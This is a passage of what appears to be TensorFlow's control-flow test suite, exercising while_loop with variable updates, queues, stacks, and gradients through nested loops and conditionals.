r = control_flow_ops.while_loop(
loop_iterator, loop_body, [n], parallel_iterations=1)
self.evaluate(variables.global_variables_initializer())
self.assertEqual(3, self.evaluate(r))
result1 = self.evaluate(select1)
self.assertAllClose(np.array([10.0, 10.0, 10.0]), result1)
result2 = self.evaluate(select2)
self.assertAllClose(np.array([10.0, 10.0, 10.0]), result2)
@test_util.disable_control_flow_v2("b/113324949 (RefVariable)")
@test_util.run_v1_only("b/120545219")
def testWhileUpdateVariable_3(self):
with self.cached_session():
select = variables.Variable([3.0, 4.0, 5.0])
n = constant_op.constant(0)
def loop_iterator(j, _):
return math_ops.less(j, 3)
def loop_body(j, _):
ns = state_ops.scatter_update(select, j, 10.0)
nj = math_ops.add(j, 1)
return [nj, ns]
r = control_flow_ops.while_loop(
loop_iterator,
loop_body, [n, array_ops.identity(select)],
parallel_iterations=1)
self.evaluate(variables.global_variables_initializer())
result = r[1]
self.assertAllClose(np.array([10.0, 10.0, 10.0]), result)
@test_util.disable_control_flow_v2("b/113324949 (RefVariable)")
@test_util.run_v1_only("b/120545219")
def testWhileUpdateVariable_4(self):
with self.cached_session():
var_a = variables.Variable(0, name="a")
var_b = variables.Variable(0, name="b")
self.evaluate(variables.global_variables_initializer())
c = constant_op.constant(0, name="c")
asn1 = state_ops.assign_add(var_a, 1, name="a_add")
# Loop condition
def pred(i):
return math_ops.less(i, 10)
# Loop body
def loop_body(i):
asn2 = state_ops.assign_add(var_b, asn1, name="b_add")
with ops.control_dependencies([asn2]):
ni = math_ops.add(i, 1, name="i_add")
return ni
lpa = control_flow_ops.while_loop(
pred, loop_body, [c], parallel_iterations=1)
self.assertEqual(0, self.evaluate(var_b))
self.evaluate(lpa) # Run the loop
self.assertEqual(10, self.evaluate(var_b))
@test_util.disable_control_flow_v2("b/113324949 (RefVariable)")
@test_util.run_v1_only("b/120545219")
def testWhileUpdateVariable_5(self):
with self.cached_session():
# Create some variables.
var_a = variables.Variable(0, name="a")
var_b = variables.Variable(0, name="b")
self.evaluate(variables.global_variables_initializer())
# Change condition to check var_b
def pred(_):
return math_ops.less(var_b, 10)
# Change body to increment var_b
def loop_body(i):
asn1 = state_ops.assign_add(
var_a, constant_op.constant(1), name="a_add")
asn2 = state_ops.assign_add(
var_b, constant_op.constant(1), name="b_add")
with ops.control_dependencies([asn1, asn2]):
inc_b = array_ops.identity(var_b)
return inc_b
lpa = control_flow_ops.while_loop(
pred, loop_body, [var_b], parallel_iterations=1, name="loop")
self.assertEqual(0, self.evaluate(var_b))
self.evaluate(lpa) # Run the loop
self.assertEqual(10, self.evaluate(var_a))
self.assertEqual(10, self.evaluate(var_b))
@test_util.disable_control_flow_v2("b/113324949 (RefVariable)")
@test_util.run_v1_only("b/120545219")
def testWhileUpdateVariable_6(self):
with self.cached_session():
# Create some variables.
var_a = variables.Variable(0, name="a")
var_b = variables.Variable(0, name="b")
c = constant_op.constant(0)
self.evaluate(variables.global_variables_initializer())
# Loop condition
def pred(i):
return math_ops.less(i, 10)
# Loop body
def loop_body(i):
asn1 = state_ops.assign_add(var_a, 1, name="a_add")
with ops.control_dependencies([asn1]):
asn2 = state_ops.assign_add(var_b, var_a, name="b_add")
with ops.control_dependencies([asn2]):
ni = math_ops.add(i, 1, name="i_add")
return ni
lpa = control_flow_ops.while_loop(
pred, loop_body, [c], parallel_iterations=1, name="loop")
self.assertEqual(0, self.evaluate(var_b))
self.evaluate(lpa) # Run the loop
self.assertEqual(55, self.evaluate(var_b))
self.assertEqual(10, self.evaluate(var_a))
@test_util.run_v1_only("b/120545219")
def testWhileQueue_1(self):
with self.cached_session():
q = data_flow_ops.FIFOQueue(-1, dtypes.int32)
i = constant_op.constant(0)
def c(i):
return math_ops.less(i, 10)
def b(i):
ni = math_ops.add(i, 1)
ni = control_flow_ops.with_dependencies([q.enqueue((i,))], ni)
return ni
r = control_flow_ops.while_loop(c, b, [i], parallel_iterations=1)
self.assertEqual([10], self.evaluate(r))
for i in xrange(10):
self.assertEqual([i], self.evaluate(q.dequeue()))
@test_util.run_v1_only("b/120545219")
def testWhileTimeOut(self):
run_options = config_pb2.RunOptions(timeout_in_ms=1)
with self.cached_session() as sess:
n = constant_op.constant(0)
c = lambda x: True
b = lambda x: math_ops.add(x, 1)
r = control_flow_ops.while_loop(c, b, [n])
with self.assertRaises(errors_impl.DeadlineExceededError):
sess.run(r, options=run_options)
@test_util.disable_control_flow_v2("b/117119329 (stack)")
@test_util.run_v1_only("b/120545219")
def testWhileStack_1(self):
with self.cached_session():
s = gen_data_flow_ops.stack_v2(-1, dtypes.int32, stack_name="foo")
i = constant_op.constant(0)
def c(i):
return math_ops.less(i, 10)
def b(i):
ni = math_ops.add(i, 1)
ni = control_flow_ops.with_dependencies(
[gen_data_flow_ops.stack_push_v2(s, i)], ni)
return ni
r = control_flow_ops.while_loop(c, b, [i], parallel_iterations=1)
x = constant_op.constant(0)
def c1(i, _):
return math_ops.greater(i, 0)
def b1(i, x):
ni = math_ops.subtract(i, 1)
nx = x + gen_data_flow_ops.stack_pop_v2(s, dtypes.int32)
return [ni, nx]
_, rx = control_flow_ops.while_loop(
c1,
b1, [r, x],
[r.get_shape(), tensor_shape.unknown_shape()],
parallel_iterations=1)
self.assertEqual(45, self.evaluate(rx))
def _testWhileGrad_ColocateGradients(self, colocate):
gpu_dev_name = test.gpu_device_name() if test.is_gpu_available(
) else "/device:CPU:0"
graph = ops.Graph()
with graph.as_default():
v = constant_op.constant(2.0, name="v")
c = lambda v: math_ops.less(v, 100.0)
def b(x):
with ops.device(gpu_dev_name):
return math_ops.square(x)
loop = control_flow_ops.while_loop(c, b, [v], parallel_iterations=1)
r = gradients_impl.gradients(
loop, v, colocate_gradients_with_ops=colocate)[0]
r_ops = graph.get_operations()
r_devices = [(op.name, op.device) for op in r_ops]
self.assertTrue(any("Square" in op.name for op in r_ops))
for (name, dev) in r_devices:
if not colocate and name.endswith("Square"):
# Only forward graph contain gpu in Square device
self.assertTrue(gpu_dev_name in dev)
elif colocate and "Square" in name:
# Forward and backward graphs contain gpu in Square/Square_grad devices
self.assertTrue(gpu_dev_name in dev)
else:
self.assertFalse(gpu_dev_name in dev)
with self.session(graph=graph) as sess:
self.assertAllClose(1024.0, self.evaluate(r))
@test_util.disable_control_flow_v2("b/116351701 (colocation)")
@test_util.run_v1_only("b/120545219")
def testWhileGrad_ColocateGradients(self):
self._testWhileGrad_ColocateGradients(colocate=False)
self._testWhileGrad_ColocateGradients(colocate=True)
@test_util.run_v1_only("b/120545219")
def testWhileGrad_Square(self):
with self.cached_session():
v = constant_op.constant(2.0, name="v")
c = lambda v: math_ops.less(v, 100.0)
b = math_ops.square
r = control_flow_ops.while_loop(c, b, [v], parallel_iterations=1)
r = control_flow_ops.cond(math_ops.less(1, 2), lambda: r, lambda: v)
r = gradients_impl.gradients(r, v)[0]
self.assertAllClose(1024.0, self.evaluate(r))
@test_util.run_v1_only("b/120545219")
def testWhileGrad_Shape(self):
with self.cached_session():
x = array_ops.placeholder(dtypes.float32, shape=[None])
v = constant_op.constant([2.0], name="v")
n = constant_op.constant(0, name="n")
c = lambda i, v: math_ops.less(i, 5)
b = lambda i, v: [i + 1, math_ops.multiply(x, v)]
r = control_flow_ops.while_loop(
c,
b, [n, v],
[n.get_shape(), tensor_shape.unknown_shape()],
parallel_iterations=1)
r = gradients_impl.gradients(r[1], x)[0]
self.assertEqual([None], r.get_shape().as_list())
self.assertAllClose([810.0, 2560.0], r.eval(feed_dict={x: [3.0, 4.0]}))
@test_util.run_deprecated_v1
def testWhileGrad_BaseShape(self):
with self.cached_session() as sess:
x = array_ops.placeholder(dtypes.float32, [None])
v0 = constant_op.constant([2.0, 2.0], name="v")
c = lambda v: constant_op.constant(False)
b = lambda v: math_ops.multiply(v, x)
r = control_flow_ops.while_loop(c, b, [v0])
y = math_ops.square(x)
r = gradients_impl.gradients([r, y], x)[0]
self.assertAllClose([2.0, 4.0], sess.run(r, feed_dict={x: [1.0, 2.0]}))
@test_util.run_v1_only("b/120545219")
def testWhileGrad_MultipleUses(self):
with self.cached_session():
v = constant_op.constant(2.0, name="v")
c = lambda v: math_ops.less(v, 100.0)
b = math_ops.square
r = control_flow_ops.while_loop(c, b, [v], parallel_iterations=1)
r = math_ops.multiply(r, r)
r = gradients_impl.gradients(r, v)[0]
self.assertEqual(524288.0, self.evaluate(r))
@test_util.run_v1_only("b/120545219")
def testWhileGrad_LoopAdd(self):
with self.cached_session():
v = constant_op.constant(2.0, name="v")
c = lambda v: math_ops.less(v, 100.0)
b = math_ops.square
r = control_flow_ops.while_loop(c, b, [v], parallel_iterations=1)
r = math_ops.add(r, r)
r = gradients_impl.gradients(r, v)[0]
self.assertAllClose(2048.0, self.evaluate(r))
def _testWhileGrad_Mul(self, use_gpu, p_iters):
with self.cached_session(use_gpu=use_gpu) as sess:
a = constant_op.constant(3.0, name="a")
v = constant_op.constant(2.0, name="v")
c = lambda v: math_ops.less(v, 100.0)
b = lambda v: math_ops.multiply(v, a)
r = control_flow_ops.while_loop(c, b, [v], parallel_iterations=p_iters)
grad_a, grad_v = gradients_impl.gradients(r, [a, v])
grad_a_val, grad_v_val = self.evaluate([grad_a, grad_v])
self.assertAllClose(216.0, grad_a_val)
self.assertAllClose(81.0, grad_v_val)
@test_util.disable_control_flow_v2("b/116630618 (parallel_iters: times out)")
@test_util.run_deprecated_v1
def testWhileGrad_Mul(self):
self._testWhileGrad_Mul(use_gpu=False, p_iters=1)
self._testWhileGrad_Mul(use_gpu=False, p_iters=10)
self._testWhileGrad_Mul(use_gpu=True, p_iters=1)
self._testWhileGrad_Mul(use_gpu=True, p_iters=10)
def _testNestedWhileCondWhileGrad(self, use_gpu):
with self.cached_session(use_gpu=use_gpu):
v = constant_op.constant(1.0)
def inner_loop(s):
z = constant_op.constant(0)
c = lambda i, x: math_ops.less(i, 4)
b = lambda i, x: [math_ops.add(i, 1), math_ops.multiply(x, 2.0)]
return control_flow_ops.while_loop(c, b, [z, s])
c = lambda x: math_ops.less(x, 128.0)
def b(x):
return control_flow_ops.cond(
constant_op.constant(True),
lambda: math_ops.square(inner_loop(x)[1]),
lambda: math_ops.multiply(x, 2.0))
r = control_flow_ops.while_loop(c, b, [v])
r = gradients_impl.gradients(r, v)[0]
self.assertAllClose(512.0, self.evaluate(r))
@test_util.run_deprecated_v1
def testNestedWhileCondWhileGrad(self):
self._testNestedWhileCondWhileGrad(use_gpu=False)
@test_util.run_deprecated_v1
def testNestedWhileCondWhileGradGpu(self):
self._testNestedWhileCondWhileGrad(use_gpu=True)
@test_util.run_v1_only("b/120545219")
def testWhileGrad_Variable(self):
with self.cached_session():
a = variables.Variable(3.0)
v = constant_op.constant(2.0, name="v")
c = lambda v: math_ops.less(v, 100.0)
b = lambda v: math_ops.multiply(v, a)
r = control_flow_ops.while_loop(c, b, [v], parallel_iterations=1)
r = gradients_impl.gradients(r, a)
self.evaluate(variables.global_variables_initializer())
self.assertAllClose(216.0, r[0])
@test_util.run_deprecated_v1
def testWhileGrad_ResourceVariable(self):
with self.cached_session():
a = resource_variable_ops.ResourceVariable(3.0)
v = constant_op.constant(2.0, name="v")
c = lambda v: math_ops.less(v, 100.0)
b = lambda v: math_ops.multiply(v, a)
r = control_flow_ops.while_loop(c, b, [v], parallel_iterations=1)
g = gradients_impl.gradients(r, a)
self.evaluate(variables.global_variables_initializer())
self.assertAllClose(216.0, g[0])
@test_util.run_v1_only("b/120545219")
def testWhileGradInCond(self):
with self.cached_session():
n = ops.convert_to_tensor(1.0, name="n")
x = array_ops.placeholder(dtypes.float32, shape=None)
c = lambda n: math_ops.less(n, 10.0)
b = lambda n: math_ops.add(n, x)
def fn1():
r = control_flow_ops.while_loop(c, b, [n],
[tensor_shape.unknown_shape()])
return gradients_impl.gradients(r, x)[0]
r = control_flow_ops.cond(math_ops.less(1, 2), fn1, lambda: x)
self.assertAllClose(9.0, r.eval(feed_dict={x: 1.0}))
@test_util.disable_control_flow_v2("b/116340060")
@test_util.run_v1_only("b/120545219")
def testGradInWhileWrtInitialLoopVal(self):
with self.cached_session():
x = array_ops.placeholder(dtypes.float32, shape=(), name="x")
y = x + 1
def body(i, v):
z = v * 2
return i + 1, gradients_impl.gradients(z, x)[0]
with self.assertRaisesRegexp(
ValueError,
"Cannot compute gradient inside while loop with respect to op 'x'. "
"We do not support taking the gradient wrt or through the initial "
"value of a loop variable. Gradients can be computed through "
"loop invariants or wrt the input parameters to the loop body."):
control_flow_ops.while_loop(lambda i, x: i < 3, body, [0, y])
@test_util.run_v1_only("b/120545219")
def testWhileGradInWhile(self):
with self.cached_session():
n = ops.convert_to_tensor(1.0, name="n")
x = array_ops.placeholder(dtypes.float32, shape=None)
c = lambda n: math_ops.less(n, 10.0)
b = lambda n: math_ops.add(n, x)
def b1(n):
r = control_flow_ops.while_loop(c, b, [n],
[tensor_shape.unknown_shape()])
return gradients_impl.gradients(r, x)
r = control_flow_ops.while_loop(lambda n: n < 6.0, b1, [n],
[tensor_shape.unknown_shape()])
self.assertAllClose(9.0, r.eval(feed_dict={x: 1.0}))
@test_util.run_v1_only("b/120545219")
def testCondGradInNestedWhiles(self):
def outer_body(i, x):
_, x = control_flow_ops.while_loop(
lambda j, x: j < 3, inner_body, [0, 0.0])
return i + 1, x
def inner_body(j, x):
y = control_flow_ops.cond(math_ops.less(x, 1), lambda: 2 * x, lambda: x)
return j + 1, gradients_impl.gradients(y, x)[0]
i, x = control_flow_ops.while_loop(lambda i, x: i < 3, outer_body, [0, 0.0])
with self.cached_session() as sess:
i_val, x_val = self.evaluate([i, x])
self.assertEqual(i_val, 3)
self.assertAllClose(x_val, 1.0)
@test_util.run_gpu_only
def testGpuResourceAccess(self):
with ops.device(test.gpu_device_name()):
var = resource_variable_ops.ResourceVariable(constant_op.constant(3.0))
@def_function.function
def foo():
return control_flow_ops.while_loop(
lambda i, _: i < 3,
lambda i, x: (i + 1, control_flow_ops.cond(
constant_op.constant(True),
lambda: x + var,
lambda: x)),
[0, 0.0])[1]
self.evaluate(variables.global_variables_initializer())
self.assertEqual(self.evaluate(foo()), 9.0)
def testNestedResourceAccess(self):
var = resource_variable_ops.ResourceVariable(constant_op.constant(3.0))
@eager_function.defun
def test_fn():
x = constant_op.constant(0.0)
r = control_flow_ops.while_loop(
# Outer loop condition
lambda i, y: i < 2,
# Outer loop body
lambda i, y: (i + 1, y + control_flow_ops.cond(
constant_op.constant(True),
# True branch
lambda: control_flow_ops.while_loop(
# Inner loop condition
lambda j, z: j < 3,
# Inner loop body
lambda j, z: (j + 1, z + math_ops.square(var)),
# Inner initial loop value
[0, y])[1],
# False branch
lambda: (0.0))),
# Outer initial loop value
[0, x])[1]
grad = gradients_impl.gradients(r, x)[0]
return r, grad
self.evaluate(variables.global_variables_initializer())
r, grad = self.evaluate(test_fn())
# 2 * 3 * 3^2
self.assertEqual(r, 81.0)
# v1 control flow gets the wrong answer!!!
# Gradient computation:
# f(x) = x + 3^2
# inner_loop(x) = f(f(f(x))) = x + 3*3^2 = x + 27
# g(x) = x + inner_loop(x) = 2x + 27
# outer_loop(x) = g(g(x)) = 4x + 81
# outer_loop'(x) = 4
# Note that v1 control flow gets 4.0 as well if the cond is removed.
if control_flow_util.ENABLE_CONTROL_FLOW_V2:
self.assertEqual(grad, 4.0)
def testWhile_NestedInput(self):
with self.cached_session() as sess:
named = collections.namedtuple("named", ("a", "b"))
loop_vars = [
named(a=constant_op.constant(0.0), b=constant_op.constant(1.0)),
(constant_op.constant(2.0), constant_op.constant(3.0)),
constant_op.constant(4.0)
]
c = lambda lv0, _1, _2: lv0.a < 100.0
def b(lv0, lv1, lv2):
lv0 = named(a=lv0.a + 1, b=lv0.b)
lv1 = (lv1[0] + 1, lv1[1])
lv2 += 2
return [lv0, lv1, lv2]
r = control_flow_ops.while_loop(c, b, loop_vars)
self.assertTrue(isinstance(r, list))
self.assertTrue(isinstance(r[0], named))
self.assertTrue(isinstance(r[1], tuple))
self.assertTrue(isinstance(r[2], ops.Tensor))
r_flattened = nest.flatten(r)
self.assertEqual([100.0, 1.0, 102.0, 3.0, 4.0 + 100 * 2.0],
self.evaluate(r_flattened))
@test_util.run_v1_only("b/120545219")
def testWhile_NestedBadArityFails(self):
with self.cached_session():
named = collections.namedtuple("named", ("a", "b"))
loop_vars = [
named(a=constant_op.constant(0.0), b=constant_op.constant(1.0)),
(constant_op.constant(2.0), constant_op.constant(3.0)),
constant_op.constant(4.0)
]
c = lambda lv0, _1, _2: lv0.a < 100.0
def b(lv0, lv1, _):
return [lv0, lv1]
with self.assertRaisesRegexp(ValueError, "the same number of elements"):
control_flow_ops.while_loop(c, b, loop_vars)
@test_util.run_v1_only("b/120545219")
def testWhileGrad_ys_xs(self):
with self.cached_session():
x = constant_op.constant(3.0, name="x")
y = constant_op.constant(2.0, name="y")
c = lambda x, y: math_ops.less(x, 100.0)
def b(x, y):
y1 = math_ops.add(x, y)
x1 = math_ops.multiply(x, y1)
return x1, y1
rx, ry = control_flow_ops.while_loop(c, b, [x, y], parallel_iterations=1)
r = gradients_impl.gradients([rx, ry], x)
self.assertAllClose(304.0, r[0])
r = gradients_impl.gradients([rx, ry], y)
self.assertAllClose(124.0, r[0])
r = gradients_impl.gradients([rx], x)
self.assertAllClose(295.0, r[0])
r = gradients_impl.gradients([rx], y)
self.assertAllClose(120.0, r[0])
@test_util.run_deprecated_v1
def testWhileGrad_Dependency(self):
with self.cached_session():
i = constant_op.constant(0, name="i")
x = constant_op.constant(2.0, name="x")
c = lambda i, x: math_ops.less(i, 10)
def b(i, x):
x = math_ops.multiply(x, 2.0)
i = math_ops.add(i, 1)
return i, x
ri, rx = control_flow_ops.while_loop(c, b, [i, x], parallel_iterations=1)
r = gradients_impl.gradients([ri, rx], x)
self.assertAllClose(1024.0, r[0])
r = gradients_impl.gradients([rx], x)
self.assertAllClose(1024.0, r[0])
@test_util.disable_control_flow_v2("b/116355153 (back_prop flag)")
@test_util.run_v1_only("b/120545219")
def testWhileGrad_NoGradient(self):
with self.cached_session():
v = constant_op.constant(2.0, name="v")
c = lambda v: math_ops.less(v, 100.0)
b = math_ops.square
r = control_flow_ops.while_loop(c, b, [v], back_prop=False)
r = math_ops.add(r, v)
r = gradients_impl.gradients(r, v)
self.assertAllClose(1.0, r[0])
@test_util.disable_control_flow_v2("b/113324949 (RefVariable)")
@test_util.run_v1_only("b/120545219")
def testWhileGrad_NoDependency(self):
with self.cached_session() as sess:
variable = variables.Variable(array_ops.ones([2, 3]))
duration = array_ops.zeros([], dtype=dtypes.int32)
def cond(duration, tensor, _):
del tensor
return duration < 10
def body(duration, tensor, _):
return (duration + 1, tensor, tensor)
loop_vars = [duration, variable, variable]
tensors = control_flow_ops.while_loop(
cond=cond, body=body, loop_vars=loop_vars)
cost = math_ops.reduce_sum(tensors[2])
grad = gradients_impl.gradients(cost, [variable])
self.evaluate(variables.global_variables_initializer())
self.assertAllClose(np.ones([2, 3]), sess.run(grad[0]))
@test_util.run_deprecated_v1
def testWhileGrad_Const(self):
with self.cached_session() as sess:
c0 = constant_op.constant(0.0, name="c0")
c1 = constant_op.constant(1.0, name="c1")
duration = constant_op.constant(0, name="t")
def cond(duration, _):
return duration < 1
def body(duration, _):
return duration + 1, c1
loop_vars = [duration, c0]
tensors = control_flow_ops.while_loop(
cond=cond, body=body, loop_vars=loop_vars)
cost = math_ops.reduce_sum(tensors[1])
grad = gradients_impl.gradients(cost, [c0])
self.assertAllClose(0.0, sess.run(grad[0]))
@test_util.run_v1_only("b/120545219")
def testWhileGrad_SerialTwoLoops(self):
with self.cached_session():
i = constant_op.constant(0, name="i")
x = constant_op.constant(2.0, name="x")
c = lambda i, x: math_ops.less(i, 5)
def b(i, x):
x = math_ops.multiply(x, 2.0)
i = math_ops.add(i, 1)
return i, x
_, rx = control_flow_ops.while_loop(c, b, [i, x], parallel_iterations=1)
_, rx = control_flow_ops.while_loop(c, b, [i, rx], parallel_iterations=1)
r = gradients_impl.gradients([rx], x)
self.assertAllClose(1024.0, r[0])
@test_util.run_v1_only("b/120545219")
def testWhileGrad_ParallelTwoLoops(self):
with self.cached_session():
i = constant_op.constant(0, name="i")
x = constant_op.constant(2.0, name="x")
c = lambda i, x: math_ops.less(i, 5)
def b(i, x):
x = math_ops.multiply(x, 2.0)
i = math_ops.add(i, 1)
return i, x
_, r1 = control_flow_ops.while_loop(c, b, [i, x], parallel_iterations=1)
_, r2 = control_flow_ops.while_loop(c, b, [i, x], parallel_iterations=1)
rx = math_ops.add(r1, r2)
r = gradients_impl.gradients([rx], x)
self.assertAllClose(64.0, r[0])
@test_util.run_v1_only("b/120545219")
def testWhileGrad_OneOutputWithControlDependencyOnSecond(self):
with self.cached_session():
i = constant_op.constant(0, name="i")
x = constant_op.constant(1.0, name="x")
y = constant_op.constant(1.0, name="y")
c = lambda i, *_: math_ops.less(i, 1, name="cond_less")
def b(i, xi, yi):
# return (i + 1, xi, xi + yi)
return (math_ops.add(i, 1, name="inc"), array_ops.identity(
xi, name="xi"), math_ops.add(xi, yi, name="xi_plus_yi"))
_, x_f, y_f = control_flow_ops.while_loop(c, b, [i, x, y])
with ops.control_dependencies([x_f]):
y_f_d = array_ops.identity(y_f, name="y_f_d")
self.assertAllClose(2.0, self.evaluate(y_f_d)) # y_f_d = 1.0 + 1.0
g = gradients_impl.gradients([y_f_d], [x])[0]
self.assertTrue(g is not None)
self.assertAllClose(1.0,
self.evaluate(g)) # y_f_d = x + 1.0, dy_f_d/dx = 1.0
def _testNestedWhileGrad_Simple(self, use_gpu):
with self.cached_session(use_gpu=use_gpu):
v = constant_op.constant(1.0)
def inner_loop(s):
c = lambda x: math_ops.less(x, 4.0)
b = lambda x: math_ops.multiply(x, 2.0)
return control_flow_ops.while_loop(c, b, [s])
c = lambda x: math_ops.less(x, 2.0)
b = lambda x: math_ops.multiply(inner_loop(x), 2.0)
r = control_flow_ops.while_loop(c, b, [v])
r = gradients_impl.gradients(r, v)[0]
self.assertAllClose(8.0, self.evaluate(r))
@test_util.run_deprecated_v1
def testNestedWhileGrad_Simple(self):
self._testNestedWhileGrad_Simple(use_gpu=False)
self._testNestedWhileGrad_Simple(use_gpu=True)
@test_util.run_v1_only("b/120545219")
def testNestedWhileGrad_SerialInner(self):
with self.cached_session():
v = constant_op.constant(1.0)
def inner_loop1(s):
z = constant_op.constant(0)
c = lambda i, x: math_ops.less(i, 4)
b = lambda i, x: [math_ops.add(i, 1), math_ops.multiply(x, 2.0)]
return control_flow_ops.while_loop(c, b, [z, s])
def inner_loop2(s):
z = constant_op.constant(0)
c = lambda i, x: math_ops.less(i, 4)
b = lambda i, x: [math_ops.add(i, 1), math_ops.multiply(x, 2.0)]
return control_flow_ops.while_loop(c, b, [z, s])
c = lambda x: math_ops.less(x, 128.0)
b = lambda x: inner_loop2(inner_loop1(x)[1])[1]
r = control_flow_ops.while_loop(c, b, [v])
r = gradients_impl.gradients(r, v)[0]
self.assertAllClose(256.0, self.evaluate(r))
@test_util.run_deprecated_v1
def testNestedWhileGrad_ParallelInner(self):
with self.cached_session():
v = constant_op.constant(1.0)
def inner_loop1(s):
z = constant_op.constant(0)
c = lambda i, x: math_ops.less(i, 4)
b = lambda i, x: [math_ops.add(i, 1), math_ops.multiply(x, 2.0)]
return control_flow_ops.while_loop(c, b, [z, s])
def inner_loop2(s):
z = constant_op.constant(0)
c = lambda i, x: math_ops.less(i, 4)
b = lambda i, x: [math_ops.add(i, 1), math_ops.multiply(x, 2.0)]
return control_flow_ops.while_loop(c, b, [z, s])
c = lambda x: math_ops.less(x, 128.0)
b = lambda x: math_ops.multiply(inner_loop1(x)[1], inner_loop2(x)[1])
r = control_flow_ops.while_loop(c, b, [v])
r = gradients_impl.gradients(r, v)[0]
self.assertAllClose(512.0, self.evaluate(r))
@test_util.run_v1_only("b/120545219")
def testNestedWhileGrad_ParallelIterations(self):
# Make sure the stack pushes and pops of an inner loop are executed in
# the sequential order of the iterations of its outer loop.
with self.cached_session() as sess:
def inner_loop(t):
fn = lambda n: n + math_ops.square(var)
return functional_ops.map_fn(fn=fn, elems=t, parallel_iterations=10)
def outer_loop(inp):
return functional_ops.map_fn(
fn=inner_loop, elems=inp, parallel_iterations=10)
var = variables.Variable(constant_op.constant(3.0))
inp = constant_op.constant([[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]])
res = outer_loop(inp)
optimizer = adam.AdamOptimizer(learning_rate=0.001)
train_op = optimizer.minimize(math_ops.reduce_mean(math_ops.square(res)))
self.evaluate(variables.global_variables_initializer())
self.evaluate(train_op)
self.assertAllClose(2.999, var.read_value())
def _testWhileCondGrad_Simple(self, use_gpu):
with self.cached_session(use_gpu=use_gpu):
v = ops.convert_to_tensor(2.0, name="v")
n = ops.convert_to_tensor(100.0, name="n")
one = ops.convert_to_tensor(1.0, name="one")
c = lambda x: math_ops.less(x, n)
# pylint: disable=undefined-variable
# for OSS build
b = lambda x: control_flow_ops.cond(constant_op.constant(True),
lambda: math_ops.square(x),
lambda: math_ops.subtract(x, one))
# pylint: enable=undefined-variable
r = control_flow_ops.while_loop(c, b, [v])
r = gradients_impl.gradients(r, v)[0]
self.assertAllClose(1024.0, self.evaluate(r))
@test_util.disable_control_flow_v2("b/117519152")
@test_util.run_deprecated_v1
def testWhileCondGrad_Simple(self):
self._testWhileCondGrad_Simple(use_gpu=False)
self._testWhileCondGrad_Simple(use_gpu=True)
@test_util.disable_control_flow_v2("b/117276490")
@test_util.run_deprecated_v1
def testWhileCondGrad_UnknownShape(self):
with self.cached_session() as sess:
v = array_ops.placeholder(dtypes.float32)
n = ops.convert_to_tensor(100.0, name="n")
one = ops.convert_to_tensor(1.0, name="one")
c = lambda x: math_ops.less(x, n)
# pylint: disable=undefined-variable
# for OSS build
b = lambda x: control_flow_ops.cond(constant_op.constant(True),
lambda: math_ops.square(x),
lambda: math_ops.subtract(x, one))
# pylint: enable=undefined-variable
r = control_flow_ops.while_loop(c, b, [v])
r = gradients_impl.gradients(r, v)[0]
r = sess.run(r, feed_dict={v: 2.0})
self.assertAllClose(1024.0, r)
@test_util.run_deprecated_v1
def testWhileGrad_Concat(self):
with self.cached_session() as sess:
x = variable_scope.get_variable("x", initializer=[[1., 2.]])
i0 = constant_op.constant(0)
h0 = array_ops.zeros([0, 2])
def condition(i, _):
return i < 2
def body(i, h):
return i + 1, array_ops.concat([h, x], 0)
_, h = control_flow_ops.while_loop(
condition, body, [i0, h0],
[i0.get_shape(), tensor_shape.TensorShape([None, 2])])
s = math_ops.reduce_sum(h)
optimizer = gradient_descent.GradientDescentOptimizer(0.01)
op = optimizer.minimize(s)
self.evaluate(variables.global_variables_initializer())
self.evaluate(op)
self.assertAllClose([[0.98000002, 1.98000002]], self.evaluate(x))
@test_util.disable_control_flow_v2("b/113324949 (RefVariable)")
@test_util.run_v1_only("b/120545219")
def testWhileWithRefsWithGradients_1(self):
with self.cached_session() as sess:
x = variables.VariableV1(0.)._ref() # pylint: disable=protected-access
i = constant_op.constant(0)
c = lambda i, x: math_ops.less(i, 10)
self.assertEqual(x.dtype, dtypes.float32_ref)
def body(i, x):
self.assertEqual(x.dtype, dtypes.float32_ref)
return [i + 1, gen_array_ops.ref_identity(x)]
r = control_flow_ops.while_loop(c, body, [i, x], parallel_iterations=5)
grad_ys = [variables.VariableV1(73)._ref()] # pylint: disable=protected-access
grad = gradients_impl.gradients([r[1]], [x], grad_ys=grad_ys)
self.evaluate(variables.global_variables_initializer())
self.assertEqual(r[0].dtype, dtypes.int32)
self.assertEqual(r[1].dtype, dtypes.float32_ref)
value_i, value_x, value_x_grad = sess.run(r + grad)
self.assertEqual(10, value_i)
self.assertEqual(0, value_x)
self.assertEqual(73, value_x_grad)
@test_util.disable_control_flow_v2("b/116282023 (IndexedSlices)")
@test_util.run_v1_only("b/120545219")
def testWhileGrad_IndexedSlices(self):
with self.cached_session():
values = constant_op.constant([2.0, 4.0], name="values")
indices = constant_op.constant([0, 3], name="indices")
shape = constant_op.constant([10], name="dense_shape")
i = constant_op.constant(0)
x = ops.IndexedSlices(values, indices, dense_shape=shape)
def c(i, _):
return i < 10
def b(i, x):
return [
i + 1,
ops.IndexedSlices(x.values * 2.0, x.indices, x.dense_shape)
]
_, r = control_flow_ops.while_loop(c, b, [i, x])
r = gradients_impl.gradients(r.values, values)[0]
self.assertAllClose(np.array([1024.0, 1024.0]), self.evaluate(r))
@test_util.disable_control_flow_v2("b/116328420 (SparseTensor)")
@test_util.run_v1_only("b/120545219")
def testWhileGrad_SparseTensor(self):
with self.cached_session():
values = constant_op.constant([2.0, 4.0], name="values")
indices = constant_op.constant(
[[0], [3]], dtype=dtypes.int64, name="indices")
shape = constant_op.constant([10], dtype=dtypes.int64, name="dense_shape")
i = constant_op.constant(0)
x = sparse_tensor.SparseTensor(indices, values, dense_shape=shape)
def c(i, _):
return i < 10
def b(i, x):
return [
i + 1,
sparse_tensor.SparseTensor(x.indices, x.values * 2.0, x.dense_shape)
]
_, r = control_flow_ops.while_loop(c, b, [i, x])
r = gradients_impl.gradients(r.values, values)[0]
self.assertAllClose(np.array([1024.0, 1024.0]), self.evaluate(r))
@test_util.disable_control_flow_v2("b/115920078 (gradients)")
@test_util.run_v1_only("b/120545219")
def testCallGradInLoop(self):
with self.cached_session() as sess:
i0 = constant_op.constant(0)
params = constant_op.constant(5.0)
params_1 = math_ops.square(params)
def c(i, _):
return i < 10
def b(i, x):
data = constant_op.constant([1.0, 2.0, 3.0])
data = math_ops.multiply(data, params_1)
x1 = x + gradients_impl.gradients(data, params)[0]
return i + 1, x1
output_grad = control_flow_ops.while_loop(
c, b, [i0, constant_op.constant(0.0)])
self.assertAllClose(600.0, self.evaluate(output_grad)[1])
